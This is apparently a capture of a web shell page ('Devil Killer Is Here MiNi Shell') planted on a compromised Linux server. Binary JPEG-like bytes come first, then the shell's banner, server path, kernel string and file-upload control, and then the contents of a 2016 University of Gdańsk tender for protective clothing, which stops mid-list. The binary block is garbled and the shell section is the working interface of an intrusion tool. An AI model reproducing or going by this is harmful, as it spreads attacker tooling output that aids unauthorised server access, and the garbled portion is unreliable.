JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/49428-N-2016.html

<p class="kh_header"><b>Gdańsk: Część I:  sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia dla Uniwersytetu      Gdańskiego,
Część II: sukcesywna dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego</b><br>
<b>Numer ogłoszenia: 49428 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 8, 80-309 Gdańsk, woj. pomorskie, tel. 58 523 23 20, faks 58 523 31 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I:  sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia dla Uniwersytetu      Gdańskiego,
Część II: sukcesywna dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia publicznego jest dostawa:
Część I: sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia dla Uniwersytet Gdańskiego,
Część II: sukcesywna dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego według części I i II
  
Część  I
(CPV) : 18131000-6; 18141000-9; 18142000-6; 18223200-0,
sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia zwanych w dalszej części odzieżą.
1) Pod pojęciem sukcesywna dostawa należy rozumieć - dostawy dokonywane częściowo w różnych ilościach nie przekraczających wartości umowy.
2) Szczegółowy wykaz odzieży (opisy i ilości) zawarte są w załączniku nr 2 do SIWZ.
3) Podane ilości poszczególnych asortymentów odzieży w załączniku nr 2 do SIWZ są ilościami przewidywanymi (szacunkowymi) nie wiążącymi dla Zamawiającego i mogą ulec zmianie co nie będzie stanowić zmiany umowy, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy kwoty  określonej w § 3 ust.2 umowy.
4) Wykonawca poniesie wszelkie koszty niezbędne do zrealizowania zamówienia wynikające ze szczegółowej specyfikacji zawartej w formularzu cenowym stanowiącym załącznik nr 2 (do SIWZ), jak również w nim nie ujęte, a bez których nie można wykonać zamówienia.
5) Wykonawca dostarczy odzież na swój koszt własnym transportem.
6) Termin dostawy zamówionej partii odzieży nie będzie dłuższy niż: 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego, nie uwzględnia się przy obliczaniu terminu dnia złożenia zamówienia z uwzględnieniem zapisów rozdziału XII pkt 1 ppkt 2 termin dostawy jest jednym z kryteriów oceny ofert.  
7) Wielkość i częstotliwość zamówień poszczególnych partii odzieży wynikać będzie z jednostronnych dyspozycji Zamawiającego (przewiduje się 12 zamówień w czasie trwania umowy),
8) Zamówienia przekazywane będą Wykonawcy drogą elektroniczną, z podaniem zapotrzebowania ilościowego oraz rozmiarów odzieży.  
9) Miejsce dostaw częściowych partii odzieży: magazyn Zamawiającego 80-308 Gdańsk, ul. Wita Stwosza 58, od poniedziałku do piątku w godzinach od 7:00 - 15:00, z wyłączeniem dni ustawowo wolnych od pracy i dni wolnych wyznaczonych u Zamawiającego.
10) Wykonawca skontaktuje się z osobą wymienioną w § 5 ust. 12 umowy w celu potwierdzenia dokładnego terminu dostawy, jednak nie może on przekroczyć terminu o którym mowa w § 2 ust. 2 umowy.
11) Dostawę każdorazowo uważać się będzie za zrealizowaną w terminie, jeżeli wszystkie pozycje zamieszczone w zamówieniu częściowym  Zamawiającego zostaną dostarczone do miejsca dostawy wskazanego, w pkt 9 i odebrane w całości protokołem odbioru, podpisanym bez zastrzeżeń.
12) Zamawiający może odmówić przyjęcia  odzieży w przypadku:
a) stwierdzenia rozbieżności pomiędzy przedstawioną w ofercie a dostarczoną przez Wykonawcę,
b) widocznego uszkodzenia lub wad  odzieży, uniemożliwiającej jej użycie,
c) niezgodności rozmiarów dostarczonej odzieży z zamawianą. 
13) W przypadkach określonych w ppkt. 12, przedstawiciel Zamawiającego, o którym mowa w § 5 ust. 12 umowy sporządza protokół zawierający przyczyny odmowy odebrania odzieży, a Wykonawca jest obowiązany do jej wymiany na nową wolną od wad w terminie uzgodnionym z Zamawiającym.
Jeżeli tak ustalony termin przekroczy termin realizacji zamówienia, o którym mowa w § 2 ust. 2 umowy,  Zamawiający naliczy Wykonawcy karę umowną zgodnie z § 7 ust. 1 pkt. 1)  umowy.
14) Zamawiający wymaga aby dostarczona  odzież  posiadała nienaruszone cechy pierwotnego opakowania, była opatrzona metkami z nazwą producenta, składem tkaniny, materiału, z którego została wykonana, sposobem czyszczenia (prania), konserwacji, prasowania i rozmiarami.
15) Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia (w ramach prawa opcji) o wartości maksymalnie 20% wynagrodzenia brutto Wykonawcy określonego w § 3 ust. 2 umowy. W tym przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego, przewidziana rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnego Wykonawcy, skorzystanie z prawa opcji nie stanowi zmiany umowy.   
16) Pozycje odzieży nr 1, 2, 3,  4, 10, 11, 12, 13, 15, 16, 17, 18, 20, 29, 30, 49, 50, 51, 52, 53, 54, 56, 58 z załącznika nr 2 do SIWZ mają posiadać certyfikat normy europejskiej CE.
17) Gwarancja na odzież 12 miesięcy zgodnie z § 6  umowy.


II część
(CPV): 18223200-0; 18815000-5,
Sukcesywna dostawa kurtek terenowych i butów terenowych zwanych w dalszej części odzieżą terenową.
1) Pod pojęciem sukcesywna dostawa należy rozumieć - dostawy dokonywane częściowo w różnych ilościach nie przekraczających wartości umowy.
2) Szczegółowy wykaz odzieży terenowej (opisy i ilości) zawarte są w załączniku nr 2 do SIWZ.
3) Podane ilości poszczególnych asortymentów odzieży terenowej w załączniku nr 2 do SIWZ są ilościami przewidywanymi (szacunkowymi) nie wiążącymi dla Zamawiającego i mogą ulec zmianie co nie będzie stanowić zmiany umowy, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy kwoty  określonej w § 3 ust.2 umowy.
4) Wykonawca poniesie wszelkie koszty niezbędne do zrealizowania zamówienia wynikające ze szczegółowej specyfikacji zawartej w formularzu cenowym stanowiącym załącznik nr 2 (do SIWZ), jak również w nim nie ujęte a bez których nie można wykonać zamówienia.
5) Wykonawca dostarczy odzież terenową na swój koszt własnym transportem.
6) Termin dostawy zamówionej partii odzieży terenowej nie będzie dłuższy niż: 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego, nie uwzględnia się przy obliczaniu terminu dnia złożenia zamówienia z uwzględnieniem zapisów rozdziału XII pkt 1 ppkt 2 termin dostawy jest jednym z kryteriów oceny ofert.  
7) Wielkość i częstotliwość zamówień poszczególnych partii odzieży terenowej wynikać będzie z jednostronnych dyspozycji Zamawiającego (przewiduje się 4 zamówienia w czasie trwania umowy).
8) Zamówienia przekazywane będą Wykonawcy drogą elektroniczną, z podaniem zapotrzebowania ilościowego oraz rozmiarów odzieży terenowej.
9) Miejsce dostaw częściowych partii odzieży terenowej: magazyn Zamawiającego 80-308 Gdańsk, ul. Wita Stwosza 58 od poniedziałku do piątku w godzinach od 7:00 - 15:00, z wyłączeniem dni ustawowo wolnych od pracy i dni wolnych wyznaczonych u Zamawiającego.
10) Wykonawca skontaktuje się z osobą wymienioną w § 5 ust. 11 umowy w celu potwierdzenia dokładnego terminu dostawy, jednak nie może on przekroczyć terminu o którym mowa w § 2 ust. 2 umowy.
11) Dostawę każdorazowo uważać się będzie za zrealizowaną w terminie, jeżeli wszystkie pozycje zamieszczone w zamówieniu częściowym  Zamawiającego zostaną dostarczone do miejsca dostawy wskazanego, w pkt 9 i odebrane w całości protokołem odbioru, podpisanym bez zastrzeżeń.
12) Zamawiający może odmówić przyjęcia  odzieży terenowej w przypadku:
a) stwierdzenia rozbieżności pomiędzy przedstawioną w ofercie a dostarczoną przez Wykonawcę,
b) widocznego uszkodzenia lub wad  odzieży terenowej, uniemożliwiającej jej użycie,
c) niezgodności rozmiarów dostarczonej odzieży terenowej z zamawianą.
13) W przypadkach określonych w ppkt. 12, przedstawiciel Zamawiającego, o którym mowa w § 5 ust. 11 umowy sporządza protokół zawierający przyczyny odmowy odebrania odzieży terenowej, a Wykonawca jest obowiązany do jej wymiany na nową wolną od wad w terminie uzgodnionym z Zamawiającym.
Jeżeli tak ustalony termin przekroczy termin realizacji zamówienia, o którym mowa w § 2 ust. 2 umowy, Zamawiający naliczy Wykonawcy karę umowną zgodnie z § 7 ust. 1 pkt. 1) umowy,
14) Zamawiający wymaga aby dostarczona  odzież terenowa posiadała nienaruszone cechy pierwotnego opakowania:
a) kurtki  opatrzone były wszytymi metkami z nazwą producenta, składem tkaniny temperaturą prania, konserwacji,  prasowania i rozmiarami,
b) buty opatrzone były metkami z nazwą producenta, opisem sposobu konserwacji i rozmiarem.
15) Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia (w ramach prawa opcji) o wartości maksymalnie 20% wartości brutto wynagrodzenia Wykonawcy określonego w § 3 ust. 2 umowy. W tym przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego, przewidziana rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnego Wykonawcy, skorzystanie z prawa opcji nie stanowi zmiany umowy.   
16) Zamawiający dopuszcza możliwość złożenia oferty równoważnej. Pod pojęciem równoważności rozumieć należy, iż Wykonawca zapewni uzyskanie parametrów nie gorszych od opisanych przez Zamawiającego w załączniku nr 2 do SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego - art. 30 ust. 5 ustawy.
17) Gwarancja na odzież terenową 12 miesięcy zgodnie z § 6  umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.13.10.00-6, 18.14.10.00-9, 18.14.20.00-6, 18.22.32.00-0, 18.81.50.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium. Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości: 
I część     4.000,00  PLN (cztery tysiące złotych),               
II część    1.600,00  PLN (jeden tysiąc sześćset złotych).     
2. W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804, z późn. zm.). 
3. Poręczenie, gwarancja, o których mowa w pkt 2 powinny być ważne przez okres związania ofertą - kopia wadium powinna być dołączona do oferty, a oryginał dołączony do oferty w osobnej kopercie. 
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania z ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy.
4. Oferta niezabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego.
5. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum, kilku z nich lub wszystkich konsorcjantów łącznie.
6. Wadium wnoszone w formie pieniężnej należy wnieść w terminie składania ofert przelewem na konto: BANK PEKAO S.A. IV/O Gdańsk Nr 54124012711111000014925434 z oznaczeniem: Wadium do postępowania nr A120-211-26/16/ZZ - z oznaczeniem numeru i nazwą  części do której zostało wniesione.
Potwierdzeniem tej formy będzie kopia przelewu (wpłaty) załączona do oferty. Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie (rozdział X SIWZ) znajdzie się na rachunku bankowym Zamawiającego.
7. Ewentualne przesunięcie terminu składania ofert jest jednoznaczne z  przesunięciem terminu wniesienia wadium.
8. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie  wykluczony z postępowania, a ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
1) Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana,
3) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa  w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej,  lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
10. Zwrot wadium:
1) Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem pkt 9 ppkt 3. 
2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 
3) Z zastrzeżeniem art. 46 ust. 4a ustawy, Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert, 
b) który został wykluczony z postępowania, 
c) którego oferta została odrzucona. 
4) Jeżeli wadium wniesiono w pieniądzu Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11. W przypadku przedłużenia okresu związania ofertą, Wykonawca musi jednocześnie przedłużyć okres ważności wadium albo jeżeli nie jest to możliwe wnieść nowe wadium na przedłużony okres związania ofertą.
12. Ponowne złożenie wadium lub jego przedłużenie:
1) Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium, a jeśli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. W związku z przedłużeniem terminu związania ofertą po wyborze oferty najkorzystniejszej Zamawiający żąda ponownego wniesienia wadium lub przedłużenia jego ważności przez Wykonawcę, którego oferta została wybrana jako najkorzystniejsza. 
2) Zamawiający żąda w określonym terminie ponownego wniesienia wadium przez Wykonawcę, któremu je zwrócono, jeśli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów opisanych w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I:
Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę, wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej głównej dostawy  odzieży ochronnej, roboczej oraz obuwia  - na  wartość nie mniejszą  niż  80.000,00 zł. brutto. 

Część II:
Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę, wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej głównej dostawy kurtek terenowych i butów terenowych  - na  wartość nie mniejszą  niż  30.000,00 zł. brutto. 
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów opisanych w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów opisanych w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów opisanych w rozdziale V SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów opisanych w rozdziale V SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
